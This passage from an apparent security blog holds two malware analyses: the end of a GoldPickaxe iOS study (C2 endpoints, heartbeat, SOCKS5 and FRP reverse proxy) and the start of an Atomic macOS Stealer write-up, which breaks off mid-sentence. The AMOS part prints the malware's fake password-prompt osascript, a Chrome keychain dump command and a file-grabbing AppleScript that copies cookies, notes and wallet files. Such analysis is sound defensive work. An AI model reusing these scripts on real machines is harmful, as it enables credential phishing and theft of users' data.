class="nl">failure:</span><span class="nb">nil</span> <span class="cm">/* can be set or not */</span> <span class="p">];</span> </code></pre></div></div> <h2 id="application-startup">Application Startup</h2> <p>When the application starts, the <strong>-[AppDelegate application:didFinishLaunchingWithOptions:]</strong> method is executed. If there were crashes, the malware gets the crash detail (<strong>getCrash</strong>), saves the crash detail in the <strong>standUserDefaults</strong> and sends it to the C2 (the two <strong>saveCrash</strong> method), after that, the malware checks if the application should be terminated (<strong>isDestory</strong>). If that’s the case the application exits (<strong>_exit</strong>), otherwise it sets the <strong>isStartFrp</strong> flag variable to <strong>0</strong> (this variable is used to determine if the <strong>fast reverse proxy</strong> is executed).</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img12.png" alt="Screenshot" /> <em><center>Figure 12 - GetCrash and isDestory Methods</center></em></p> <h3 id="getcrash">getCrash</h3> <p>The <strong>+[UserDefaultsManager getCrash:]</strong> method is responsible to get the crashes details, we are not going to show its details.</p> <h3 id="savecrash">saveCrash</h3> <p>The <strong>+[HttpUtils saveCrash:]</strong> method executes a <strong>HTTP</strong> Post request to “<strong>/api/apple/savecrash</strong>”, it sends two parameters:</p> <ul> <li><strong>adid</strong> with the <strong>IDFA</strong> value</li> <li><strong>content</strong> with the crash details If the request succeeds the malware executes a function that print a log message, otherwise the malware executes another function that do a <strong>RET</strong> instruction.</li> </ul> <p>In the screenshow below we can see the <strong>saveCrash</strong> method.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img13.png" alt="Screenshot" /> <em><center>Figure 13 - HttpUtils saveCrash Method</center></em></p> <p>The <strong>+[UserDefaultsManager saveCrash:]</strong> method is responsible to save the crashes details into the <strong>standUserDefaults</strong>, we are not going to show its details.</p> <h3 id="isdestory">isDestory</h3> <p>The <strong>+[UserDefaultsManager isDestory]</strong> method is responsible to check if the application should be terminated, this is done by checks if the key “<strong>isDestory</strong>” in the standardUserDefaults is set to <strong>1</strong>.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img14.png" alt="Screenshot" /> <em><center>Figure 14 - UserDefaultsManager isDestory Method</center></em></p> <h3 id="websocket-connection">Websocket Connection</h3> <p>After all these checks, the malware tries to connect to the <strong>websocket</strong> server using the <a href="https://github.com/acmacalister/jetfire">JetFire library</a> from github. In the disassembler we can recognize the code snipet from the github readme.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img15.png" alt="Screenshot" /> <em><center>Figure 15 - Websocket Connection</center></em></p> <h2 id="scheduled-tasks">Scheduled Tasks</h2> <p>At this point the malware uses the <strong>NSTimer</strong> class to invoke the <a href="https://developer.apple.com/documentation/foundation/nstimer/1412416-scheduledtimerwithtimeinterval">scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:</a> method to schedule fours tasks. We can see the method details below.</p> <div class="language-objective_c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">+</span> <span class="p">(</span><span class="n">NSTimer</span> <span class="o">*</span><span class="p">)</span><span class="nf">scheduledTimerWithTimeInterval</span><span class="p">:(</span><span class="n">NSTimeInterval</span><span class="p">)</span><span class="nv">ti</span> <span class="nf">target</span><span class="p">:(</span><span class="n">id</span><span class="p">)</span><span class="nv">aTarget</span> <span class="nf">selector</span><span class="p">:(</span><span class="n">SEL</span><span class="p">)</span><span class="nv">aSelector</span> <span class="nf">userInfo</span><span class="p">:(</span><span class="n">id</span><span class="p">)</span><span class="nv">userInfo</span> <span class="nf">repeats</span><span class="p">:(</span><span class="n">BOOL</span><span class="p">)</span><span class="nv">yesOrNo</span><span class="p">;</span> </code></pre></div></div> <p>Parameters:</p> <ul> <li><strong>timeinterval</strong>: the number of seconds between firings of the timer. If it is less than or equal to 0.0, this method chooses the nonnegative value of 0.0001 seconds instead</li> <li><strong>target</strong>: the object to which to send the message specified by aSelector when the timer fires. The timer maintains a strong reference to target until it (the timer) is invalidated</li> <li><strong>selector</strong>: the message to send to target when the timer fires</li> <li><strong>userInfo</strong>: the user info for the timer. The timer maintains a strong reference to this object until it (the timer) is invalidated</li> <li><strong>repeats</strong>: if YES, the timer will repeatedly reschedule itself until invalidated. If NO, the timer will be invalidated after it fires</li> </ul> <p>The malware schedules the execution of four tasks: <strong>sendHeartbeat</strong>, <strong>checkAuth</strong>, <strong>checkWifi</strong>, and <strong>testSpeed</strong>.</p> <h3 id="sendheartbeat">sendHeartbeat</h3> <p>The <strong>-[AppDelegate sendHeartbeat]</strong> methods is used to let the C2 know that the malware is alive on the victim’s phone. It writes che strings “<strong>heartbeat</strong>” on the <strong>websocket</strong> connection.</p> <p>Let’s see how it is executed and how it works.</p> <p>Before schedule the task, the malware saves the value <strong>10</strong> (<strong>0x40A00000</strong>) in a <strong>float</strong> variable called “<strong>heartTime</strong>”, after that it schedules the task to execute the <strong>sendHeartbeat</strong> method after a Time Interval of <strong>5.0</strong> ms, the repeats param is set to <strong>1</strong>, this means that the task will reschedule itself.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img16.png" alt="Screenshot" /> <em><center>Figure 16 - sendHeartbeat Task</center></em></p> <p>The <strong>sendHeartbeat</strong> method checks if the <strong>websocket</strong> connection is up, if not it tries to reconnect, otherwise if the value of the “<strong>heartTime</strong>” is not equal to <strong>5.0</strong>, it invalidates and reschedules the task again with a Time Interval of <strong>104</strong> ms ( <strong>0x41A00000</strong>). Then the method writes the string “<strong>Heartbeat</strong>” on the <strong>websocket</strong> connection.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img17.png" alt="Screenshot" /> <em><center>Figure 17 - sendHeartbeat Method</center></em></p> <h3 id="checkauth">checkAuth</h3> <p>The <strong>-[AppDelegate checkAuth]</strong> method checks if the user has given the application permission to access the photo library.</p> <p>The malware schedules the <strong>checkAuth</strong> method with a Time Interval of <strong>34.5</strong> ms (<strong>0x404E000000000000</strong>), as for the previous task, the <strong>repeats</strong> param is set to <strong>1</strong>, this means that this task will reschedule itself.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img18.png" alt="Screenshot" /> <em><center>Figure 18 - checkAuth Task</center></em></p> <p>The <strong>checkAuth</strong> method executes the <strong>hasPicAuth</strong> method that it just a wrapper for the <strong>+[PHPhotoLibrary authorizationStatus]</strong> method used to check if the user has given the application permission related to the photo library.</p> <p>If the permission is enabled, the malware executes the <strong>+[HttpUtils updateAuth:auth:]</strong> method with two arguments, the strings “<strong>2</strong>” and “<strong>1</strong>”.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img19.png" alt="Screenshot" /> <em><center>Figure 19 - checkAuth Method</center></em></p> <p>The <strong>updateAuth:auth:</strong> method performs a <strong>HTTP Post</strong> request to “<strong>/api/apple/applyauth</strong>”, it sends three parameters:</p> <ul> <li><strong>adid</strong> with the IDFA value</li> <li><strong>type</strong> with the value <strong>2</strong></li> <li><strong>auth</strong> with the value <strong>1</strong></li> </ul> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img20.png" alt="Screenshot" /> <em><center>Figure 20 - updateAuth:auth: Method</center></em></p> <h3 id="checkwifi">checkWifi</h3> <p>The <strong>-[AppDelegate checkWifi]</strong> method is used to check if the phone is connected via WiFi.</p> <p>The malware schedules the <strong>checkWifi</strong> method with a Time Interval of <strong>30</strong> ms , the repeats param is set to <strong>1</strong> in this case too.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img21.png" alt="Screenshot" /> <em><center>Figure 21 - checkWifi Task</center></em></p> <p>The <strong>checkWifi</strong> method is just a wrapper for the <strong>+[HttpUtils changeWifiStatus]</strong> method that performs a <strong>HTTP Post</strong> request to “<strong>/api/apple/changewifistatus</strong>”, it sends two parameters:</p> <ul> <li><strong>adid</strong> with the <strong>IDFA</strong> value</li> <li><strong>is_wifi</strong> with the value returned from the <strong>+[HttpUtils isWifi]</strong> method</li> </ul> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img22.png" alt="Screenshot" /> <em><center>Figure 22 - changeWifiStatus Method</center></em></p> <p>The <strong>isWiFi</strong> method compares the return value of the <a href="https://github.com/tonymillion/Reachability/">opensource</a> <strong>-[Reachability currentReachabilityStatus]</strong> method, if the returned value is <strong>2</strong> (it means that the WiFi is used) it returns <strong>1</strong> otherwise it returns <strong>0</strong>.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img23.png" alt="Screenshot" /> <em><center>Figure 23 - isWiFi Method</center></em></p> <p>We can recognize the <strong>currentReachabilityStatus</strong> method in the disassembler.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img24.png" alt="Screenshot" /> <em><center>Figure 24 - currentReachabilityStatus Method</center></em></p> <h3 id="testspeed">testSpeed</h3> <p>The <strong>-[AppDelegate testSpeed]</strong> method is used to calculate information related to the connection speed.</p> <p>The malware execute the <strong>-[AppDelegate testSpeed]</strong> method, and then schedules the execution of the same method with a Time Interval of <strong>34.5</strong> ms , the repeats param is set to <strong>1</strong> in this case too.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img25.png" alt="Screenshot" /> <em><center>Figure 25 - testSpeed Task</center></em></p> <p>The <strong>testSpeed</strong> method executes the ping command to “www.google.com” using the <strong>PPSPing</strong> <a href="https://github.com/yangqian111/PPSPing/">open source project</a>. It uses two variable to calculate the connection speed:</p> <ul> <li><strong>integer pingCount</strong> contains the number of pings</li> <li><strong>double pingTime</strong> contains the ping ms result</li> </ul> <p>In the following screenshot we can see that the two variable are initialize to <strong>0</strong>, and then we can recognize the <strong>PPSPing startWithCallbackHandler</strong> method.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img26.png" alt="Screenshot" /> <em><center>Figure 26 - testSpeed Method</center></em></p> <p>The <strong>callback</strong> function checks the value of the <strong>pingCount</strong> variable and perform the following actions:</p> <ul> <li>if <strong>pingCount&lt;= 9</strong>: it updates the the <strong>pingTime</strong> and the <strong>pingCount</strong> variables</li> <li>if <strong>pingCount&gt; 9</strong>: it calculates the signal value (<strong>pingTime/pingCount</strong>), stops the ping execution, and call the <strong>+[HttpUtils changeSigna:]</strong> with the calculated signal values as parameter</li> </ul> <p>The <strong>changeSigna</strong>: method performs a <strong>HTTP Post</strong> request to “<strong>/api/apple/changesignal</strong>” with two parameters:</p> <ul> <li><strong>adid</strong> with the <strong>IDFA</strong> value</li> <li><strong>signal</strong> with the calculated value (<strong>pingTime/pingCount</strong>)</li> </ul> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img27.png" alt="Screenshot" /> <em><center>Figure 27 - changeSigna Method</center></em></p> <h2 id="websocket-callback">Websocket Callback</h2> <p>When the <strong>JetFire</strong> library websocket connection succeeds, the delegate method <strong>-[AppDelegate websocketDidConnect:]</strong> is executed.</p> <p>It calls the <strong>-[AppDelegate checkDestruction]</strong> method responsible to ask the C2 if the application should be terminated.</p> <p>If the application is not terminated, the <strong>isStartFrp</strong> flag variable is checked, if the value of the variable is <strong>1</strong>, the method exits because the <strong>fast reverse proxy</strong> is already running, otherwise it executes the <strong>-[AppDelegate getFrpConfigStart]</strong> method via <strong>dispatch_after</strong>.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img28.png" alt="Screenshot" /> <em><center>Figure 28 - websocketDidConnect Method</center></em></p> <h3 id="checkdestruction">checkDestruction</h3> <p>The <strong>checkDestruction</strong> method performs a <strong>HTTP Post</strong> request to “<strong>/api/apple/checkdestruction</strong>” by sending the <strong>adid</strong> with the <strong>IDFA</strong> value as parameter, it also sets a function to be execute if the request succeeds.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img29.png" alt="Screenshot" /> <em><center>Figure 29 - checkDestruction Method</center></em></p> <p>The executed function (if the request suceeds) checks if the received value from the C2 is the string “<strong>1</strong>” and in this case it executes the <strong>setDestory</strong> method that is responsible to add the key <strong>isDestroy</strong> with value “<strong>1</strong>” in the <strong>standardUserDefaults</strong> (if you remember the <strong>+[UserDefaultsManager isDestory]</strong> method checks this value), then it executes a wrapper for the <strong>exit</strong> function via <strong>dispatch_time</strong>.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img30.png" alt="Screenshot" /> <em><center>Figure 30 - Succes Executed Function</center></em></p> <h3 id="getfrpconfigstart">getFrpConfigStart</h3> <p>The <strong>-[AppDelegate getFrpConfigStart]</strong> method, performs a <strong>HTTP Post</strong> request to “<strong>/api/apple/getfrpconfig</strong>” by sending the <strong>adid</strong> with the <strong>IDFA</strong> value as parameter, if the request succeeds, the <strong>sub_10001340C</strong> function is executed.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img31.png" alt="Screenshot" /> <em><center>Figure 31 - getFrpConfigStart Method</center></em></p> <p>The <strong>sub_10001340C</strong> function parses the server response in order to get the configuration values for the <strong>fast reverse proxy</strong>.</p> <p>It reads the <strong>config.ini</strong> file, and replace each value for the <strong>server_addr</strong>, <strong>server_port</strong>, <strong>token</strong> and <strong>remote_port</strong> keys with the ones received from the C2 server.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img32.png" alt="Screenshot" /> <em><center>Figure 32 - sub_10001340C Method</center></em></p> <p>After replaced each value, it writes the new configuration in a new file called <strong>newconfig.ini</strong> then it executes the <strong>-[AppDelegate setIsStartFrp:]</strong> responsible for setting the variable <strong>isStartFrp</strong> to <strong>1</strong>.</p> <p>At this point it executes two <strong>dispatch_async</strong> function to set up the <strong>socks5</strong> server and the <strong>fast reverse proxy</strong>.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img33.png" alt="Screenshot" /> <em><center>Figure 33 - sock5 and fast reverse proxy Methods</center></em></p> <p>The <strong>sock5</strong> server is implemented using the <a href="https://github.com/rofl0r/microsocks">open source portable socks5 server</a> <strong>microsocks</strong> we can recognize it in the disassembler.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img34.png" alt="Screenshot" /> <em><center>Figure 34 - microsocks</center></em></p> <p>The fast reverse proxy, is implemented using the <a href="https://github.com/fatedier/frp">open source project</a> <strong>FRP</strong>.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img35.png" alt="Screenshot" /> <em><center>Figure 35 - FRP</center></em></p> <h1 id="conclusion">Conclusion</h1> <p>The opportunity to analyze iOS malware is very rare, so diving into the <strong>Gold Pickaxe</strong> sample was an interesting experience.</p> <p>We examined the <strong>IPA</strong> content and observed how the malware connects to the C2 using the <strong>webSocket</strong> and the <strong>HTTP</strong> protocols to establish the connection and send data.</p> <p>Analyzing the entire malware would provide valuable insights into how the received commands are processed.</p> <p>Due to the European <strong>Digital Market Act</strong>, Apple will be required to permit the use of external markets, which could potentially be used by cybercriminals to introduce iOS malware.</p> Fri, 19 Apr 2024 00:00:00 +0200 https://syrion.me/goldpickaxe-technical-analysis-ipa-c2/ https://syrion.me/goldpickaxe-technical-analysis-ipa-c2/ Malware iOS Atomic macOS Stealer (AMOS) Analysis <p>Hello everybody, this is my first macOS malware analysis, I took a sample from <a href="https://bazaar.abuse.ch/sample/08ff8a6500d623b062dcef8a2ef6fc141c1871f7a84b42f842d470fee26070c4/">malwarebazaar</a> and tried to reverse it, the sample was uploaded by Cryptolaemus1 on 14 Feb 2024.</p> <p>While analysing the stage two, it was clear that the sample is a variant of Atomic Stealer.</p> <p>Atomic Stealer, as reported by <a href="https://www.sentinelone.com/blog/atomic-stealer-threat-actor-spawns-second-variant-of-macos-malware-sold-on-telegram/">SentinelOne</a> is a macOS info stealer sold on Telegram, able to grab system information, account credential, browser data, session cookies and crypto wallets.</p> <p>The main behaviours are the same already well described by <a href="https://russianpanda.com/2024/01/15/Atomic-Stealer-AMOS">RussianPanda</a>.</p> <h2 id="stage-one">Stage One</h2> <p>The file downloaded from malwarebazaar is a dmg file called <strong>application_v1.1.dmg</strong>, I don’t know where it came from but we can suppose that it was distributed as a fake program as reported by <a href="https://www.malwarebytes.com/blog/threat-intelligence/2023/11/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates">Malwarebytes</a>.</p> <p>The SHA-256 for the file is <strong>08ff8a6500d623b062dcef8a2ef6fc141c1871f7a84b42f842d470fee26070c4</strong>, obiviously it was already submitted on <a href="https://www.virustotal.com/gui/file/08ff8a6500d623b062dcef8a2ef6fc141c1871f7a84b42f842d470fee26070c4/detection">VirusTotal</a>.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img1.png" alt="Screenshot" /> <em><center>Figure 1 - VirusTotal application_v1.1.dmg</center></em></p> <p>The dmg contains the following files:</p> <ul> <li>.DS_Store</li> <li>.DropDMGBackground</li> <li>.fseventsd</li> <li>AppleApp</li> </ul> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img2.png" alt="Screenshot" /> <em><center>Figure 2 - application_v1.1.dmg Content</center></em></p> <p>The mach-o <strong>AppleApp</strong> file is reported as malicious by <a href="https://www.virustotal.com/gui/file/4ac7d15c8a397cd68ba9e7166b2e356175761bf4580d0e03e3db994c3ceda3fa">VirusTotal</a>, its SHA-256 is <strong>4ac7d15c8a397cd68ba9e7166b2e356175761bf4580d0e03e3db994c3ceda3fa</strong></p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img3.png" alt="Screenshot" /> <em><center>Figure 3 - VirusTotal AppleApp</center></em></p> <p>The file is signed with an adhoc signature.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img4.png" alt="Screenshot" /> <em><center>Figure 4 - AppleApp adhoc Signature</center></em></p> <p>When the dmg file is opened, it shows the following image requesting the user to right click and use the <strong>open</strong> option.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img5.png" alt="Screenshot" /> <em><center>Figure 5 - AppleApp Installation</center></em></p> <p>When the the file is opened, it asks the user to enter his password.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img6.png" alt="Screenshot" /> <em><center>Figure 6 - Password Pop-up</center></em></p> <p>Let’s try to reverse engineer the <strong>AppleApp</strong> mach-o to understand what it does.</p> <h3 id="decrypt-stage-two-mach-o">Decrypt Stage Two Mach-o</h3> <p>The <strong>main</strong> function of the x64 AppleApp mach-o, creates and prints the string “<strong>osascript -e ‘tell application “Terminal” to close first windows&amp; exit ‘</strong>”, and executes a <strong>fork</strong>, after that the parent process exits while the child process executes <strong>setsid</strong>, the osascript via <strong>system</strong> and the <strong>main2</strong> function by running a new thread.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img7.png" alt="Screenshot" /> <em><center>Figure 7 - AppleApp Main Function</center></em></p> <p>The <strong>main2</strong> function gets the user name by executing <strong>getenv(“USER”)</strong>, it decrypts an embedded mach-o file using the <strong>encryptDecrypt</strong> function (<strong>0xBFC10</strong> is the size of the encrypted file), writes the decrypted file to <strong>/Users/USERNAME/exe</strong>, then using <strong>system</strong> it executes <strong>chmod +x</strong> on the new created file to make it executable, then it runs the <strong>exe</strong> file via <strong>system</strong>, after that it sleeps for 1 seconds and deletes the <strong>/Users/USERNAME/exe</strong> file.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img8.png" alt="Screenshot" /> <em><center>Figure 8 - AppleApp Main2 Function</center></em></p> <p>The <strong>encryptDecrypt</strong> function is a simple xor between the encrypted mach-o file and the hardcoded key 0x13.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img9.png" alt="Screenshot" /> <em><center>Figure 9 - AppleApp encryptDecrypt Function</center></em></p> <h2 id="stage-two">Stage Two</h2> <p>The mach-o <strong>exe</strong> file is reported as malicious by <a href="https://www.virustotal.com/gui/file/c802c94d0836039aa986e66200233bdf84a9f68512e7ba6d22e93ab679309d4a">VirusTotal</a>, its SHA-256 is c802c94d0836039aa986e66200233bdf84a9f68512e7ba6d22e93ab679309d4a.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img10.png" alt="Screenshot" /> <em><center>Figure 10 - VirusTotal exe</center></em></p> <p>The file is signed with an adhoc signature.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img11.png" alt="Screenshot" /> <em><center>Figure 11 - exe adhoc Signature</center></em></p> <p>The <strong>main</strong> function is similar to the one of the AppleApp mach-o, it creates and prints the string “<strong>osascript -e ‘tell application “Terminal” to close first windows&amp; exit ‘</strong>”, executes a <strong>fork</strong>, the parent process exits and the child process continue the execution.</p> <p>The child process executes <strong>setsid</strong>, and executes the osascript by using the <strong>shellermy</strong> function.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img12.png" alt="Screenshot" /> <em><center>Figure 12 - exe Main Function</center></em></p> <p>The <strong>shellermy</strong> function is used to execute commands, it uses the <strong>popen</strong> function, and then reads the command output using the <strong>fread</strong> functions as shown in the image below.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img13.png" alt="Screenshot" /> <em><center>Figure 13 - exe Shellermy Function</center></em></p> <p>After this the malware executes several functions to steal informations and files from the system.</p> <h3 id="verify-the-user-password">Verify The User Password</h3> <p>The malware checks the user password by calling the <strong>shellermy</strong> function with the <strong>dscl</strong> command shown below as parameter.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dscl <span class="nb">.</span> authonly <span class="s2">"username"</span> <span class="s2">"password"</span> </code></pre></div></div> <p>If the password is valid the <strong>dscl</strong> command returns an empty response, otherwise the following message is returned.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img14.png" alt="Screenshot" /> <em><center>Figure 14 - Credential Validation Fails</center></em></p> <p>The <strong>haha_check_cv</strong> function is used to validate the <strong>dscl</strong> command output, it returns 1 if the user password is valid, otherwise it returns 0. In the following screenshot, we can see the <strong>haha_check_cv</strong> function executes the <strong>shellermy</strong> function (with the <strong>dscl</strong> command as parameter), comparing the <strong>shellermy</strong> output (it is the <strong>dscl</strong> command output) and returns the flag value related to the credential validity.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img15.png" alt="Screenshot" /> <em><center>Figure 15 - exe haha_check_cv Function</center></em></p> <p>The first time the <strong>dscl</strong> command is executed with a blank password, if it fails, this means that the user has a password.</p> <h3 id="ask-the-user-password">Ask the User Password</h3> <p>The <strong>getpasswordit</strong> function is used to ask the user to enter his password by calling the <strong>shellermy</strong> function with the following osascript as parameter. If the user has a blank password, this function is not executed.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>osascript <span class="nt">-e</span> <span class="s1">'display dialog "Required Application Helper. Please enter passphrase for USERNAME." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer'</span> </code></pre></div></div> <p>After that, the malware executes the <strong>dscl</strong> command again to validate the credentials, this process will be executed until the user enters the correct password. The credentials check is done by the <strong>haha_check_cv</strong> function.</p> <p>The following screenshot of the <strong>getpasswordit</strong> function, shows the exit condition from the loop responsible to ask the user password, it breaks when the <strong>haha_check_cv</strong> returns 1.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img16.png" alt="Screenshot" /> <em><center>Figure 16 - exe getpasswordit Loop</center></em></p> <h3 id="get-system-information">Get System Information</h3> <p>The malware gets system information by executing the following command via <strong>shellarmy</strong>.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>system_profiler SPSoftwareDataTye SPHardwareDataType SPDisplaysDataType </code></pre></div></div> <p>In the image below we can see a portion of the command result in the debugger.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img17.png" alt="Screenshot" /> <em><center>Figure 17 - system_profiler output</center></em></p> <p>At this point RussianPanda reportes an anti-vm check, in this sample this check is not implemented.</p> <h3 id="steal-data">Steal Data</h3> <p>The Malware uses several functions to steal files related to Browsers, Wallets and System data.</p> <p><a href="https://russianpanda.com">RussiandPanda</a> and <a href="https://www.bitdefender.com/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/">BitDefender</a> reported the new version of the “<strong>FileGrabber</strong>” functionality used by the malware to grab several files and put them in the folder <strong>~/fg/</strong>. In their blogs, they showed the osascript used to do this.</p> <p>In my sample the <strong>FileGrabber</strong> osacript and the related string <strong>FileGrabber</strong> used to create the file in the zip, are both encrypted in the segment section at the following addresses:</p> <ul> <li>0x10003DFE2</li> <li>0x10003E0FA</li> <li>0x10003E33A</li> <li>0x10003E5CA</li> <li>0x10003E8EA</li> </ul> <p>These strings are decrypted during the malware execution, but the script itself is never executed. In the following snipet you can see the decrypted <strong>FileGrabber</strong> osascript.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>osascript <span class="nt">-e</span> <span class="s1">' set destinationFolderPath to (path to home folder as text) &amp; "fg:" set extensionsList to {"txt","png","jpg","jpeg","wallet","keys","key"} set bankSize to 0 tell application "Finder" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:"fg"} end if set safariFolder to ((path to library folder from user domain as text) &amp; "Containers:com.apple.Safari:Data:Library:Cookies:") try duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) &amp; "Library:Group Containers:group.com.apple.notes:" try set notesFolder to folder notesFolderPath set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) &lt; 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder "Documents" of (path to home folder) repeat with aFile in (desktopFiles &amp; documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) &lt; 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell'</span> </code></pre></div></div> <p>It looks like that the execution of the <strong>FileGrabber</strong> osascript was disabled, but the malware is still looking for the <strong>~/fg/</strong> folder when collecting informations. I suppose it was disabled in order to not save files on disk and to not allarm the user with an additional pop-up.</p> <p>The <strong>ChronosMasiter</strong> function is used to find Chrome passwords in the keychain. It executes the following command by passing it as parameter to the <strong>shellermy</strong> function.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>security 2&gt;&amp;1 <span class="o">&gt;</span> /dev/null find-generic-password <span class="nt">-ga</span> <span class="s1">'Chrome'</span> | <span class="nb">awk</span> <span class="s1">'{print $2}'</span> </code></pre></div></div> <p>When the command is executed a system pop-up spawns because macOS wants the user to enter the password to access the keychain.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img18.png" alt="Screenshot" /> <em><center>Figure 18 - Keychain Access</center></em></p> <p>The <strong>ChronosMasiter</strong> function is executed only if the user has a blank password, I think it is a way to not allarm the user by asking for his password two times.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img19.png" alt="Screenshot" /> <em><center>Figure 19 - Call to ChronosMasiter function</center></em></p> <p>The <strong>read_dir</strong> function is used to open a directory and read its contents, it uses <strong>stat</strong>, <strong>opendir</strong> and the <strong>readdir</strong> functions as shown below.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img20.png" alt="Screenshot" /> <em><center>Figure 20 - exe read_dir Function</center></em></p> <p>The <strong>rodwrote</strong> function, is used to open and read files, it uses the <strong>open</strong> and the <strong>read</strong> functions, the file content is written into the zip using the <strong>mz_zip_writer_add_mem_ex_v2</strong> function.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img21.png" alt="Screenshot" /> <em><center>Figure 21 - exe rodwrote Function</center></em></p> <p>At this point the above functions are used to read folders and files, they are called by the following functions:</p> <ul> <li><strong>grab_this_folder_nahuy</strong> : is responsible to steal Wallets data</li> <li><strong>grab_this_nahuy</strong>: is responsible to steal Browser data</li> <li><strong>getpw</strong> : is responsible to steal data related to Chrome Wallets plugins</li> <li><strong>pathfox</strong>: is responsible to steal data related to Firefox</li> </ul> <h3 id="string-encryption">String Encryption</h3> <p>All the strings are encrypted and are stored in the <strong>const</strong> segment, for example we can see the encrypted C2 string at address <strong>0x10003DFCA</strong>.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img22.png" alt="Screenshot" /> <em><center>Figure 22 - Encrypted C2 Strings</center></em></p> <p>The strings are not directly manipulated during the decryption process, they are copied in a <strong><a href="https://stackoverflow.com/questions/72955200/how-does-macos-dyld-prepare-the-thread-local">Thread Local Variables</a></strong>(TLV) at offset <strong>0x10</strong>. For example in the image below a thread local variable is used to store the encrypted C2 strings.</p> <p><img src="/assets/images/2024-03-08-atomic-macos-stealer-amos-analysis/img23.png" alt="Screenshot" /> <em><center>Figure 23 - Thread Local Variable </center></em></p> <p>After that the encrypted strings is xored with a hardcoded key that is incremented by 1 at each iteration, for example in the following snipet the <strong>c2_thread_local_variable_1</strong> variable is the address containing the Encrypted C2 string (at offset <strong>0xA</strong>), the <strong>i</strong> variable is just a counter incresed by 1 at each iteration 